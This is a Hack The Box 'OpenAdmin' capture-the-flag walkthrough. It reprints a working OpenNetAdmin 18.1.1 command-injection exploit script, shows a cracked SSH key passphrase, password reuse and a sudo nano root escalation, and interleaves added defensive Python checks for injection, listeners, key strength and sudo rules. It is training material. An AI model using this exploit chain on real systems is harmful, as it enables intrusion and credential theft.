2020-02-10

HTB::OpenAdmin Walkthrough

0x01 Basic Information

0x02 Tools and Techniques Used

  • nmap
  • dirbuster
  • ssh2john.py
  • john
  • opennetadmin v18.1.1 exploit
  • netstat -tulpn
  • nano

0x03 Penetration Testing Process

Port scanning

[email protected]:~# nmap -sC -sV -T5 10.10.10.171
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-07 18:31 HKT
Nmap scan report for 10.10.10.171
Host is up (0.14s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
993/tcp closed imaps
1025/tcp closed NFS-or-IIS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.12 seconds

The target has ports 22 (SSH) and 80 (HTTP) open, with Apache running on port 80. Opening that port directly in a browser shows the Apache default page:

Directory enumeration

Brute-force the site's directories with DirBuster and Kali's built-in wordlist directory-list-2.3-medium.txt:

Leave DirBuster running in the background for now; the two main directories found so far are ona and music. Try the http://10.10.10.171/ona/ page directly:

There is a DOWNLOAD link; following it leads to the OpenNetAdmin website, and the current version is v18.1.1.

OpenNetAdmin is an opensource IP Address Management (IPAM) system.

A quick Google search for opennetadmin v18.1.1 exploit shows that ExploitDB lists two exploits:

https://www.exploit-db.com/exploits/47691

https://www.exploit-db.com/exploits/47772

Exploitation

# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

#!/bin/bash

URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

Save the Bash script above on Kali and run it to get a shell on the target (each command you type is sent through the injection and its output printed back):

bash ona.sh http://10.10.10.171/ona/
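As an added example (not part of this walkthrough and not OpenNetAdmin's own code), the Python below shows what a request-inspection rule or the application itself needs to recognise about the request the script above sends: the ip=> argument inside xajaxargs[] should be a literal address, and the injection only works because a shell parses whatever follows it. The two sample bodies are constructed; parse_form, classify_request and build_ping_argv are names I chose, not ONA functions.

```python
import ipaddress
import re
from urllib.parse import unquote_plus

# Constructed sample request bodies in the shape of the walkthrough's curl
# payload (not traffic captured from the box). The first is a legitimate
# tooltip/ping request, the second carries the command injection.
BENIGN_BODY = (
    "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
    "&xajaxargs[]=ip%3D%3E10.10.10.171&xajaxargs[]=ping"
)
INJECTED_BODY = (
    "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
    '&xajaxargs[]=ip%3D%3E;echo "BEGIN";id;echo "END"&xajaxargs[]=ping'
)

# Characters that let a value break out of a shell command line.
SHELL_META = re.compile(r"[;&|`$<>(){}\n]")


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into {key: [values]}.

    Splitting on '&' only (never ';') matters: the ';' is part of the payload
    and must survive as data so the inspector can see it.
    """
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def extract_ip_arg(body):
    """Return the text after 'ip=>' in the xajaxargs[] list, or None if absent."""
    for arg in parse_form(body).get("xajaxargs[]", []):
        if arg.startswith("ip=>"):
            return arg[len("ip=>"):]
    return None


def validate_ip(value):
    """Hardened input check: accept only a literal IPv4/IPv6 address, else None."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError:
        return None


def build_ping_argv(value):
    """Hardened form of 'ping the supplied host': validate first, then pass the
    address as its own argv element so no shell ever interprets it."""
    addr = validate_ip(value)
    if addr is None:
        raise ValueError("ping target is not an IP address")
    return ["ping", "-c", "1", addr]


def classify_request(body):
    """Inspection verdict for a POST to the ONA xajax endpoint: 'allow' for a
    clean ip=> value, 'block' if it is not an address or contains shell
    metacharacters, 'ignore' for requests that do not carry an ip=> argument."""
    params = parse_form(body)
    if params.get("xajax") != ["window_submit"]:
        return "ignore"
    ip = extract_ip_arg(body)
    if ip is None:
        return "ignore"
    if SHELL_META.search(ip) or validate_ip(ip) is None:
        return "block"
    return "allow"


if __name__ == "__main__":
    for name, body in (("benign", BENIGN_BODY), ("injected", INJECTED_BODY)):
        print(f"{name}: ip=>{extract_ip_arg(body)!r} -> {classify_request(body)}")
```

The strict allow-list (only literal IP addresses) is the design point: a hostname would also be rejected, so an application that legitimately pings hostnames needs its own narrow validator, but nothing that reaches a shell should ever be built by string concatenation.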

Testing shows the current user is www-data, and cd cannot be used to leave the current directory (every command is sent as a separate request, so nothing persists between them). Use find / -type d -user www-data to see which directories this user has permission to access.

  • find is the Linux command for locating files or directories.
  • The first argument, /, is where the search starts.
  • -type takes f or d, matching what we are searching for.
    • f for files
    • d for directories
  • -user restricts the match to a given owner. This command searches the whole file system under / for everything belonging to www-data.

The output is too long to paste here; it boils down to two directories, /opt/ona/www/ and /var/www/ona/. Start with the config files:

Looking at config.inc.php reveals a database configuration file:

// Include the localized Database settings
$dbconffile = "{$base}/local/config/database_settings.inc.php";

It contains the MySQL login password: n1nj4W4rri0R!. Looking at /var/www/ again, there is an internal directory owned by user jimmy, so log in over SSH as jimmy with the MySQL password.

jimmy@openadmin:~$ cd /var/www/internal
jimmy@openadmin:/var/www/internal$ ls -la
total 20
drwxrwx--- 2 jimmy internal 4096 Nov 23 17:43 .
drwxr-xr-x 4 root root 4096 Nov 22 18:15 ..
-rwxrwxr-x 1 jimmy internal 3229 Nov 22 23:24 index.php
-rwxrwxr-x 1 jimmy internal 185 Nov 23 16:37 logout.php
-rwxrwxr-x 1 jimmy internal 339 Nov 23 17:40 main.php
jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

main.php prints the RSA private key of another user, joanna, once the session has passed jimmy's login check. Now we need to find out which port this service runs on:

jimmy@openadmin:~$ curl http://localhost/main.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at localhost Port 80</address>
</body></html>

It is not on the normal port 80, so run netstat -tulpn:

jimmy@openadmin:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:52846 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
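Added example, not from the walkthrough: a small Python triage script that reads the netstat -tulpn listing above (embedded as the sample input) and separates sockets bound only to loopback from externally exposed ones, then compares the ports against an assumed baseline for this host. The function names and the EXPECTED_PORTS baseline are my assumptions; a loopback-only service with no authentication, like the one on 52846, is exactly what such a check should surface, because any local account can reach it.

```python
import ipaddress

# The netstat -tulpn listing from the walkthrough, used as the sample input.
NETSTAT_OUTPUT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:52846 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
"""

# Ports this host is expected to serve (assumed baseline, not from the page).
EXPECTED_PORTS = {22, 53, 80, 3306}


def parse_netstat(text):
    """Return (proto, address, port) for every socket line in netstat -tulpn output."""
    listeners = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] not in ("tcp", "tcp6", "udp", "udp6"):
            continue
        addr, _, port = fields[3].rpartition(":")  # ':::80' -> ('::', '80')
        listeners.append((fields[0], addr, int(port)))
    return listeners


def is_loopback(addr):
    """True for 127.0.0.0/8 and ::1; wildcard binds (0.0.0.0, ::) are not loopback."""
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False


def loopback_only_listeners(text):
    """Sockets reachable only from the host itself: bound to a loopback address
    with no wildcard/external bind of the same port in the same protocol."""
    listeners = parse_netstat(text)
    exposed = {(proto.rstrip("6"), port) for proto, addr, port in listeners
               if not is_loopback(addr)}
    return sorted({(proto.rstrip("6"), addr, port) for proto, addr, port in listeners
                   if is_loopback(addr) and (proto.rstrip("6"), port) not in exposed})


def unexpected_listeners(text, expected=EXPECTED_PORTS):
    """Listening ports outside the baseline; these warrant finding the owning
    process (netstat shows the PID/Program column only when run as root)."""
    return sorted({(proto, addr, port) for proto, addr, port in parse_netstat(text)
                   if port not in expected})


if __name__ == "__main__":
    for entry in loopback_only_listeners(NETSTAT_OUTPUT):
        print("loopback only:", *entry)
    for entry in unexpected_listeners(NETSTAT_OUTPUT):
        print("not in baseline:", *entry)
```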

Of the listed ports, the most likely candidate is 52846:

jimmy@openadmin:~$ curl http://localhost:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

Cracking the RSA key gives a password, bloodninjas:

[email protected]:~/Desktop$ python /usr/share/john/ssh2john.py joanna_rsa > joanna_rsa.hash
[email protected]:~/Desktop$ /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt joanna_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (joanna_rsa)
1g 0:00:00:16 DONE (2020-02-09 08:19) 0.06172g/s 885290p/s 885290c/s 885290C/sa6_123..*7¡Vamos!
Session completed
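Why rockyou gets through in 16 seconds is visible in john's cost lines: the key is in the legacy PEM format, whose MD5-based key derivation has no work factor. The Python below is an added example, not from the walkthrough; it audits a private key's envelope and reports whether the key is unencrypted, protected by the legacy MD5 KDF, or protected by OpenSSH's bcrypt KDF with enough rounds. The PEM header lines are taken from the key printed above; the OpenSSH-format sample is constructed by make_openssh_header (a helper name I chose), which builds only the leading fields the audit reads.

```python
import base64
import struct

# Header of the encrypted PEM key that main.php printed (one body line is
# enough; the audit reads the envelope only, never the ciphertext).
LEGACY_PEM = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
-----END RSA PRIVATE KEY-----
"""

MAGIC = b"openssh-key-v1\x00"


def _ssh_string(data):
    """Length-prefixed string as used throughout the OpenSSH key format."""
    return struct.pack(">I", len(data)) + data


def make_openssh_header(cipher, kdf, rounds, salt=b"\x00" * 16):
    """Constructed sample input: the leading fields of an OpenSSH-format key
    (magic, ciphername, kdfname, kdfoptions, key count) in the PEM-like
    envelope ssh-keygen writes. The public/private sections are omitted,
    which is fine because the audit stops after kdfoptions."""
    kdfoptions = (_ssh_string(salt) + struct.pack(">I", rounds)) if kdf == "bcrypt" else b""
    blob = (MAGIC + _ssh_string(cipher.encode()) + _ssh_string(kdf.encode())
            + _ssh_string(kdfoptions) + struct.pack(">I", 1))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


def _audit_openssh(lines):
    blob = base64.b64decode("".join(lines[1:-1]))
    if not blob.startswith(MAGIC):
        raise ValueError("bad openssh-key-v1 magic")
    pos, fields = len(MAGIC), []
    for _ in range(3):  # ciphername, kdfname, kdfoptions
        (n,) = struct.unpack(">I", blob[pos:pos + 4])
        fields.append(blob[pos + 4:pos + 4 + n])
        pos += 4 + n
    cipher, kdf, kdfoptions = fields[0].decode(), fields[1].decode(), fields[2]
    rounds = None
    if kdf == "bcrypt":
        (salt_len,) = struct.unpack(">I", kdfoptions[:4])
        (rounds,) = struct.unpack(">I", kdfoptions[4 + salt_len:8 + salt_len])
    encrypted = cipher != "none"
    if not encrypted:
        verdict = "unencrypted"
    elif kdf == "bcrypt" and rounds >= 16:  # 16 is ssh-keygen's default -a value
        verdict = "ok"
    else:
        verdict = "weak-kdf"
    return {"format": "openssh", "encrypted": encrypted, "cipher": cipher,
            "kdf": kdf, "rounds": rounds, "verdict": verdict}


def _audit_pem(lines):
    meta = {}
    for line in lines[1:]:
        if ":" not in line:  # blank line or first base64 line ends the header block
            break
        key, _, value = line.partition(":")
        meta[key.strip()] = value.strip()
    encrypted = "ENCRYPTED" in meta.get("Proc-Type", "")
    cipher = meta.get("DEK-Info", "none").split(",")[0]
    # Legacy PEM derives the key with OpenSSL's EVP_BytesToKey: MD5, a single
    # iteration and no tunable cost, which is what john's cost lines report.
    return {"format": "pem", "encrypted": encrypted, "cipher": cipher,
            "kdf": "md5" if encrypted else None, "rounds": 1 if encrypted else None,
            "verdict": "weak-kdf" if encrypted else "unencrypted"}


def audit_private_key(text):
    """Classify how a private key's secret material is protected."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if not lines or not lines[0].startswith("-----BEGIN "):
        raise ValueError("not a PEM-style private key")
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        return _audit_openssh(lines)
    return _audit_pem(lines)


if __name__ == "__main__":
    print(audit_private_key(LEGACY_PEM))
    print(audit_private_key(make_openssh_header("aes256-ctr", "bcrypt", 100)))
```

Keys flagged weak-kdf should be regenerated (or rewritten with ssh-keygen -p -o -a <rounds>) so that a passphrase guess costs a bcrypt run rather than a single MD5.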

Testing shows this password is not joanna's SSH login password but the passphrase that protects the private key when authenticating with it. Then connect to joanna's SSH; be sure to set the private key file's permissions to 700 first (ssh refuses a key that other users can read):

[email protected]:~/Desktop$ chmod 700 joanna_rsa
[email protected]:~/Desktop$ ssh -i joanna_rsa joanna@10.10.10.171
Enter passphrase for key 'joanna_rsa':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun Feb 9 14:18:59 UTC 2020

System load: 1.04 Processes: 164
Usage of /: 49.6% of 7.81GB Users logged in: 2
Memory usage: 24% IP address for ens160: 10.10.10.171
Swap usage: 0%


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Feb 9 14:17:21 2020 from 10.10.15.190
joanna@openadmin:~$

From here user.txt is easy to find:

joanna@openadmin:~$ ls -la
total 48
drwxr-x--- 6 joanna joanna 4096 Feb 9 14:17 .
drwxr-xr-x 4 root root 4096 Nov 22 18:00 ..
-rw-rw-r-- 1 joanna joanna 64 Feb 9 14:02 0
lrwxrwxrwx 1 joanna joanna 9 Nov 22 18:02 .bash_history -> /dev/null
-rw-r--r-- 1 joanna joanna 220 Nov 22 18:00 .bash_logout
-rw-r--r-- 1 joanna joanna 3771 Nov 22 18:00 .bashrc
drwx------ 2 joanna joanna 4096 Nov 22 22:42 .cache
drwx------ 3 joanna joanna 4096 Nov 22 22:42 .gnupg
drwxrwxr-x 3 joanna joanna 4096 Nov 22 18:53 .local
-rw------- 1 joanna joanna 86 Feb 9 14:17 nano.save
-rw-r--r-- 1 joanna joanna 807 Nov 22 18:00 .profile
drwx------ 2 joanna joanna 4096 Nov 23 17:31 .ssh
-rw-rw-r-- 1 joanna joanna 33 Nov 28 09:37 user.txt
joanna@openadmin:~$ cat user.txt
c9b2c[--------------]f0c81b5f

sudo -l shows that joanna can run /bin/nano /opt/priv as root without entering a password. When a user can run nano as root, this is the easiest way to exploit it.

joanna@openadmin:/$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv

From there the /root/root.txt file can be obtained.
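The sudo -l finding above is what a host hardening check should catch before an attacker does. As an added example (not from the walkthrough), the Python below parses sudo -l output and flags rules that grant an interactive program, or ALL, as another user, with NOPASSWD noted separately. The sample output reuses the joanna entry from the box and adds two constructed lines; SHELL_CAPABLE and the function names are my assumptions.

```python
import os
import re

# Constructed sample of `sudo -l` output: the joanna entry from the walkthrough
# plus two invented lines, one acceptable and one obviously unrestricted.
SUDO_L_OUTPUT = """\
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
    (root) /usr/bin/systemctl restart apache2
    (ALL : ALL) NOPASSWD: ALL
"""

# Interactive programs that can open other files or run other commands from
# inside the session; granting one of them as root is effectively granting root.
SHELL_CAPABLE = {"nano", "vim", "vi", "less", "more", "man", "bash", "sh",
                 "python", "python3", "perl", "awk", "find", "env"}

# "(runas) [TAG: ...] command" as printed by sudo -l.
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+?)\s*$")


def parse_sudo_rules(text):
    """Return the command rules that follow the 'User X may run' line."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tags, command = m.groups()
        rules.append({"runas": runas.strip(), "nopasswd": "NOPASSWD" in tags,
                      "command": command.strip()})
    return rules


def audit_sudo_rules(text):
    """Flag rules that amount to unrestricted access as the run-as user."""
    findings = []
    for rule in parse_sudo_rules(text):
        command = rule["command"]
        program = os.path.basename(command.split()[0])
        if command == "ALL":
            reason = "any command allowed"
        elif program in SHELL_CAPABLE:
            reason = f"{program} is interactive and not confined to the listed file"
        else:
            continue
        if rule["nopasswd"]:
            reason += "; no password required"
        findings.append({**rule, "reason": reason})
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_rules(SUDO_L_OUTPUT):
        print(f"({finding['runas']}) {finding['command']}: {finding['reason']}")
```

The systemctl line passes because the program is not on the list and its arguments are fixed; the usual fix for the flagged nano rule is to replace the editor grant with sudoedit (which copies the file and never runs the editor as root) or with a narrowly scoped wrapper script.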

0x04 References

https://decdeg.com/hackthebox-open-admin-10-10-10-171/

https://www.jianshu.com/p/9f1f9145ac3f

https://xz.aliyun.com/t/3958#toc-1

Copyright © ca01h 2019-2020